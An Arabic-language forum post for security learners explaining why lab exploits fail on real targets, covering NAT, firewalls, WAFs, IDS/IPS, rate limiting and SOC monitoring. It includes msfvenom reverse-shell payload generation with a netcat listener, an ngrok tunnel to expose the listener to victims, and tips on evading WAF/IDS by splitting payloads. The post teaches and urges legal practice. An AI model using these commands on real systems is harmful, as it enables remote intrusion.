
- بواسطة x32x01 ||
ليه لما بتجرب الأدوات في الكورس كل حاجة بتشتغل… ولما تيجي تجرب على الواقع الدنيا ماتشتغلش؟
الموقف دا معروف لكل اللي بيتعلموا اختراق أخلاقي أو سيكيوريتي: بتفتح اللاب، تشغّل الـ lab بتاع الكورس، تجرب أوامر زي metasploit، تروح تعمل payload، وتاخد reverse shell - كله يمشي تمام وكأنه فيلم.بعدين تحاول تطبق على هدف "حقيقي" وتتفاجئ إن مفيش حاجة بتمشي خالص. ليه يا ترى؟
في البوست ده هنتكلم بالصراحة عن الفروق بين الـ Lab (simulation) والـ Real World، وهنشرح طبقات الحماية الحقيقية اللي هتقابلك، وكمان هاديلك نصايح عملية تخليك تقرب من الواقع أكتر وانت بتتعلم.
أول حاجة: الشبكة المحلية مختلفة عن الإنترنت
المشكلة الأساسية إن معظم الكورسات بتتعامل في بيئة LAN أو Virtual Lab - الـ attacker والـ target والـ infrastructure كله داخل نفس الشبكة، يعني:- الأجهزة شايفة بعض بدون NAT أو firewall معقد.
- الـ ports مفتوحة أو مسموح بيها.
- مفيش IDS/IPS ولا WAF يشيك على الباكات.
- ممكن تستخدم VPN للوصول للـ lab والحل بسيط.
لكن في الواقع، معظم الـ targets وخصوصًا السيرفرات أو الـ web apps على السحابة عندها IP عام واحد (Public IP) وراهم أجهزة Networking (Load Balancer, NAT, Firewall) اللي بتحميهم.
الفرق بين IP Private و Public - ليه مهم
- Private IP: زي 192.168.1.5 - ده عنوان جوه الراوتر أو الشبكة الداخلية، مينفعش تتوصّل له من برا.
- Public IP: العنوان اللي العالم الخارجي بيشوفه - غالبًا الراوتر أو الـ NAT Device ليه IP واحد مش لكل جهاز.
نوعين من الهجمات: Internal vs External
Internal Attack (جوّه الشبكة)
ده اللي بتعمله في CTF أو في شبكة الشركة لما تكون متصل بالـ VPN بتاعها - الأجهزة بتشوف بعض مباشرة والموانع أقل.External Attack (من الإنترنت)
ده اللي بتستهدف سيرفر على الإنترنت - هنا هتقابل جدران حماية وأنظمة تصفية وWAF وIDS/IPS وNAT وRate-limiting وغيرها - ومش هتقدر تمشي كما في الـ lab.طبقات الحماية اللي هتقابلك في الواقع
- Firewall: بيمنع Port Scans وPing وفتح منافذ مش مصرح بها.
- NAT / Load Balancer: بيمنع الوصول المباشر للأجهزة داخل الشبكة.
- WAF (Web Application Firewall): بيحجب Payloads المشبوهة ويمنع SQLi/XSS لو معمول صح.
- IDS/IPS: بيكشف التحركات المشبوهة ويمنعها تلقائي.
- Rate-limiting: يوقف محاولات brute-force بعد عدد معين.
- DNS Filtering / CDN: ممكن تمنع الوصول لنطاقات معينة أو تحجب subdomains.
- MFA / 2FA: حتى لو حصلت على كلمة السر، الحساب محمي بخطوتين.
- SOC و Logging: مسؤولو الأمن بيراقبوا اللوجز، وده بيكشف الهجمات السريعة.
كل طبقة من دول ممكن تقف قدامك وتمنع نجاح الـ exploit اللي شغال تمام في الـ lab.
ليه الـ Payload بيشتغل في اللاب ومش برا؟ مثال عملي
في الـ lab، ممكن تبعت reverse shell مباشرة لأن السيرفر يقدر يتصل بجهازك على الـ IP اللي إنت متوقعه. في الواقع، السيرفر عادة ورا NAT وميقدرش يعمل اتصال خارجي إلا لو مفيش قيود، أو لو الـ إدارة سمحت باتصال خارجي. كمان الـ IDS ممكن يكشف البايتات بتاعة الـ payload ويمنعها.نموذج msfvenom / netcat بسيط :
Bash:
# صنع payload (مثال تعليمي)
msfvenom -p linux/x86/shell_reverse_tcp LHOST=YOUR_IP LPORT=4444 -f elf > shell.elf
# على المهاجم
nc -lvnp 4444
# على الضحية تشغّل shell.elf وتفتح لك reverse shell
./shell.elf
أكيد في حلول/طرق للتعامل - بس محتاجة جهد
1) اتعلم عن الشبكات بعمق - NAT, PAT, Port Forwarding
اعرف إزاي الراوتر بيعمل ترجمة العناوين وليه الreverse shell ممكن يفشل بسبب NAT.2) استخدم طرق عبور NAT (NAT traversal) شرعية
زي استخدام stager/reverse over HTTPS أو استخدام خدمة وسيطة (مثل ngrok) خلال التدريب المشروعة.مثال بسيط لاستخدام ngrok (للتجربة على بيئة اختبار):
Bash:
# على الجهاز المحلي
ngrok tcp 4444
# هياخد لك public address توصل له من الضحية بدل LHOST المحلي
3) اتعلم كيفية اكتشاف وBypass الحمايات (قانونيًا)
تعلم ازاي تتعامل مع WAF, IDS, IPS، إزاي تكسر Rate limits، إزاي تقسم الـ Payload بحيث ما يتكشفش - بس دا كله في إطار قانوني وبيئة اختبار.4) مارس في بيئات حقيقية قانونية
انضم لـ bug bounties (HackerOne, Bugcrowd) أو استخدم منصات زي HackTheBox وTryHackMe اللي بتحاكي الواقع أكثر.5) اقرأ Writeups وSolution للـ CTFs الواقعية
حلول الناس اللي نجحت فعلاً هتدّيك طرق وتقنيات عملية للتعامل مع الحماية الحقيقية.نصايح عملية لتقريب التجربة للواقع أثناء التعلم
- اشتري أو جهز lab فيه VLANs، firewall، IDS، وWAF لتجربة الـ defensive layers.
- عبّر عن التجارب بـ VPN لسيرفرات CTF مش الموجودة على جهازك مباشرة.
- حط Monitoring وLogging على الشبكة وانت بتجرب علشان تتعلم ازاي SOC بيراقب.
- ركز على طرق Bypass شرعية: تقسيم الـ Payload، تشفير أجزاء منه، استغلال استجابات الـ app بدل الـ code execution المباشر.
الخلاصة - مش احباط، ده واقع علشان تتعلم صح
اللي بتتعلمه في الكورس مهم جدًا لأنه بيعلمك الـ concepts الأساسية، لكن الواقع فيه Layers وعمليات دفاعية كتيرة ممكن توقفك. الفرق إن اللي بيوصل لقمة في المجال هم اللي:- بيفهموا الشبكات كويس،
- بيتعلموا ازاي تتعامل مع الحماية بدل ما يغضبوا منها،
- بيتدربوا على بيئات شبه الواقع،
- وبيشاركوا في bug bounty وCTF وحاجات قانونية.
لو شغال صح وتطبق النصايح دي، هتبدأ تشوف الـ tools بتشتغل مش بس في الكورس، لكن كمان في الواقع المعقّد.
التعديل الأخير: